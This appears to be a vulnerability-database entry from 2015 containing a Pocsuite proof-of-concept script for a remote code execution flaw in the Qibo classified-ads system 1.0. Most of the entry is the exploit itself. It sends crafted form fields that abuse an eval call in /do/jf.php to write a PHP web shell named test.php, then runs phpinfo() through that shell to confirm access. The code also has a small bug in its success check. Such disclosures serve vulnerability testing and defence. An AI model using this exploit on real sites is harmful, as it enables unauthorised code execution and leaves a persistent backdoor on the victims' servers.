齐博分类系统远程代码执行漏洞

🗓️ 02 Sep 2015 00:00:00Reported by fengType

齐博分类系统远程代码执行漏洞，影响版本分类1.


                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
    
class TestPOC(POCBase):
    vulID = '291010'  # 应该你们定的啊
    version = '1'
    author = 'feng&baozi'
    vulDate = '2015-06-24'
    createDate = '2015-08-31'
    updateDate = '2015-08-31'
    references = ['https://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.iPE9w9&id=21']
    name = '齐博分类系统远程代码执行漏洞'
    appPowerLink = 'www.qibosoft.com'
    appName = 'fenlei'
    appVersion = '1.0'
    vulType = 'Remote Commond Execute'
    desc = '''
        由于参数可控导致/do/jf.php中的eval可以被执行
    '''
    # the sample sites for examine
    samples = ['']
    
    def _attack(self):
        data={
	'postdb[city_id]':'../../hack/jfadmin/admin',
	'action':'addjf',
	'Apower[jfadmin_mod]':'1',
	'fid':'1',
	'title':'test',
	'content':'${@fwrite(fopen(\'test.php\',\'w+\'),\'<?php @assert($_POST[s]);?>\')}',
	'list':'1'
        }
        req.post(self.url+'/search.php', data=data)
        req.get(self.url+'/do/jf.php')
        response = req.post(self.url+'/do/test.php',data={'s':'phpinfo()'})
        if 'PHP Version' in res.content:
                return self.parse_attack(response)
        
    def _verify(self):
        return self._attack()
        
    def parse_attack(self, response):
        output = Output(self)
        result = {}
        if response:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url+'/do/test.php'
            result['ShellInfo']['Content'] = '<?php @assert($_POST[s]);?>'
            output.success(result)
        else:
            output.fail('Getshell failed')
        return output

02 Sep 2015 00:00Current

7.1High risk

Vulners AI Score7.1

齐博分类系统远程代码执行漏洞版本分类1.0 数据库pre_jfabout 参数可控